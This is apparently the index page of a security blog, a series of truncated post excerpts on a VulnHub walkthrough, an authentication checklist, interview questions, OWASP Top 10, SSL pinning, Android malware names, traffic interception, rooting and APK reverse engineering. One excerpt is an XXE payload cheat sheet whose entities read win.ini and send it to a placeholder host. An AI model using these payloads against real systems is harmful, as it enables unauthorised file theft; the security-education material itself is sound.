Just A N00B Thinking

This is the latest machine in VulnHub  , created by Hadi Mene  . So let's begin enumeration with Nmap. Meanwhile I was looking into the source code to get some information, but nothing special was there. So I fired up the Dirb to look into the hidden directories. Below is the output of Dirb. So I started looking into all these directories. While browsing through directories, in admin directory i found notes.txt file. Below is the output for the same. So in notes.txt, I found this note : "Note to myself : I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer." As we know, while enumeration with Nmap, we found that port 22 and 80 is open. So ssh is possible here, here I took "ted" as username (Predicted) and "12345ted123" as password. And it worked. So what's next?? We got successful login, and now let's move for...

Safety Checklist Authority System (Registration/Registration/Secondary Verification/Password Reset) Use HTTPS everywhere. Use Bcrypt to store password hash (necessary to use salt - this is what Bcrypt does). Destroy the session ID after logging out. Destroy all active sessions after password reset. OAuth2 authentication must include the state parameter. After the login is successful, it cannot be directly redirected to the open path (need to check, otherwise it is easy to have a phishing attack). Parses javascript://, data://, and other CRLF characters when parsing user login/login input. Use secure/httpOnly cookies. When OTP authentication is used on the mobile device, OTP (One Time Password) cannot be returned directly when the generate OTP or Resend OTP API is invoked. (usually by sending a mobile phone to verify SMS, mailbox random code, etc., instead of direct response) Limit the number of API calls such as Login, Verify OTP, Resend OTP, and generate OTP for i...

Cyber Security is an exotic field, and every next person wants to explore this domain and make a career in it, but the problem is they have no idea how to get in and even if they do, They don't have any idea on what type of questions they might face in an interview. Recently  @Miss_Malware  asked for everyone's favorites security analyst and DFIR interview question that gave me an idea to compile a list of questions which are asked in every interview one way or another. What follows is a list of questions which you may face in an interview. Note: All These questions have compiled with the help of @Miss_Malware's twitter thread, contribution from friends and very intelligent internet searches :P, All the relevant sources (Read those I remember) have been mentioned at end of the post. GENERAL What is DNS? Differentiate between TCP and UDP? How does HTTP handle state? Does TLS use symmetric or asymmetric encryption? What is "Risk"? What is "Risk...

Vanilla, used to verify outbound xxe or blind xxe <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> ]> <r>&sp;</r> OoB extraction <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml"> %sp; %param1; ]> <r>&exfil;</r> External dtd: <!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>"> OoB variation of above (seems to work better against .NET) <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml"> %sp; %param1; %exfil; ]> External dtd: <!ENTITY % data SYSTEM "file:///c:/win...

The Open Web Application Security Project (OWASP) officially released its Top 10 most critical web application security risks. This is the first time the organization has updated the Top 10 since 2013. “Change has accelerated over the last four years, and the OWASP Top 10 needed to change. We’ve completely refactored the OWASP Top 10, revamped the methodology, utilized a new data call process, worked with the community, re-ordered our risks, rewritten each risk from the ground up, and added references to frameworks and languages that are now commonly used,” the OWASP wrote in the Top 10 2017. According to the OWASP, some significant changes over the past couple of years that resulted in an update to the Top 10 include micro-services, single page apps, and the dominance of JavaScript as a primary language on the web. What are the Changes In 2017 SQL injection stays at the top followed by Broken Authentication. Insecure Direct Object References and Missing Function Leve...

When it comes to security of an application, Source code piracy is one of the major concerns. If your source code is available to hackers, it means you are totally screwed. Hackers can then easily bypass your applied security controls, re-build application with malicious code snippets and also misuse the business logic used in the application. Obfuscation is the process of renaming the meta-data in an Assembly so that it is no longer useful to a hacker, but remains usable to the machine for executing the intended operations. It does not modify the actual instructions or mask them from observation by a hacker. Reverse engineering of your proprietary applications by unfair competition or malicious hackers may result in highly undesirable exposure of your algorithms and ideas, proprietary data formats, licensing and security mechanisms, and, most importantly, your customers' data. Getting into more details about Code Obfuscation as given below. Name Obfuscation: Na...

What is SSL pinning? Why do we need SSL pinning in mobile applications? How to do it? SSL pinning means hard-coding the certificate known to be used by the server in the mobile application. The app can then ignore the device’s trust store and rely on its own, and allow only SSL connections to hosts signed with certificates stored inside the application. This also gives a possibility of trusting a host with a self-signed certificate without the need to install additional certificates on the device.  SSL Pinning on Android: Simplest Way PROS of Certificate Pinning: Increased security  - with pinned SSL certificates, the app is independent of the device’s trust store. Compromising the hard coded trust store in the app is not so easy - the app would need to be decompiled, changed and then recompiled again - and it can’t be signed using the same Android keystore that the original developer of the app used. Reduced costs  - SSL certificate pinning gives you ...

Most affecting and Active Malwares on Mobile Devices: DangerousObject.Multi.Generic Trojan-SMS.AndroidOS.OpFake.bo AdWare.AndroidOS.Ganlet.a Trojan-SMS.AndroidOS.FakeInst.a RiskTool.AndroidOS.SMSreg.cw Trojan-SMS.AndroidOS.Agent.u Trojan-SMS.AndroidOS.OpFake.a Trojan.AndroidOS.Plangton.a Trojan.AndroidOS.MTK.a AdWare.AndroidOS.Hamob.a Android.Geinimi SMS.AndroidOS.FakePlayer.c Android.DroidDream AKA Android.Rootcager AKA AndroidOS_Lootoor.A Android.BgServ AKA Troj/Bgserv-A AKA AndroidOS_BGSERV.A Android.KungFu Variants More are here: AegisLab, Andr/Plankton-A, Andr/SMSRep-B/C, Android, Android Market, Android OS, Android.Adrd, Android.Adrd.A, Android.Adsms, Android.Basebridge, Android.Bgserv, Android.DroidDream, Android.Fokonge, Android.Geinimi, Android.GGTracker, Android.Gunfu, Android.Hippo, Android.HippoSMS, Android.HongTouTou, Android.Jsmshider, Android.LightDD, Android.Lovetrap, Android.NickiBot, Android.Nickispy, Android.Pja...

To intercept mobile application traffic you need to perform MITM attacks. This can be easily done using proxies like Burp Suite, Fiddler, Charles, Paros, etc. I prefer to use burp suite as it is most flexible to use for penetration testing. The below given steps will help you to setup required interception environment:    Install the target application.apk on the mobile device, let’s consider Android device in this case. Now goto Menu à Setting à Wi-Fi Connect to your common Wifi being used by your Mobile device and Laptop. Find the IP address of your laptop using “ifconfig/ipconfig” command. Now in your mobile Wi-Fi, touch-n-hold the connected Wi-Fi and select “Modify Network Check the option “Show advanced options” and under proxy settings select “Manual”. Now enter ·           Proxyhostname: <your laptop IP>                ...

Java code compiled for the BlackBerry goes through the following steps using the tools mentioned:   Code is compiled using the javac.exe compiler, and an application JAR file is generated. At this point, all Java methods, constructs, and classes are fair game. The preverify.exe tool is run against the generated JAR files and looks for code constructs that are not allowed in JME applications (for example, calls to Java native invocation or invalid Java instructions). The pre-verifier is used in both BlackBerry and JME development. Once the pre-verifier step completes, the Classes are marked as verified. RIM’s compiler, rapc.exe, converts the verified JAR file to a BlackBerry executable COD file. Rapc is an optimizing compiler that removes symbolic information and adds RIM proprietary instructions to the binary in order to reduce size and improve performance. If the application is going to be deployed to a real device or to a simulator with security enabled, the COD file i...

This part focuses on Jailbreaking IOS device, Rooting Android devices and Developer unlocking Windows phones. Rooting Android Device: Rooting your device means to allow application to run with Super User permissions. There are many ways to root your android device. Below are steps to root your android device: Connect your device to computer using data-cable and ensure that Homescreen is unlocked. Download and install the  Kingo Root tool  on your computer. After installation, open the Kingo Root and it will detect you device (and install driers for it if they are missing J ). Click on “Root” to begin patching of binaries. It will take few minutes to root your device. Once successful, then you can install “SuperUser” app on your android device which will allow you to easily grant Root Permission to other application. Note:  If you are trying rooting your NEXUS device, then download  Nexus RootToolkit (NRT) instead of Kingo Tool and enjoy your rooted...

There are many simple ways to do reverse engineering (first step towards Mobile application security). As of today, there are various mobile platforms available. We will keep our primary focus on Android, IOS, Windows and Blackberry. Reverse engineering Android Mobile App (APK File): 1.     Select the APK file you want to reverse engineer. Using any extractor like 7zip, extract the files. 2.       Now you can see a file named classes.dex. 3.       Using the tool   dex2jar  to convert classes.dex into a readable jar. Command : dex2jar.bat classes.dex 4.   Now using any Java decompiler, you can open the newly converted file "classes_dex2jar". In my case i am using   jdgui , a free tool. 5.       Now you can see all the packages and class files inside it. 6.       Look for hard-coded sensitive information in the code (if code is ...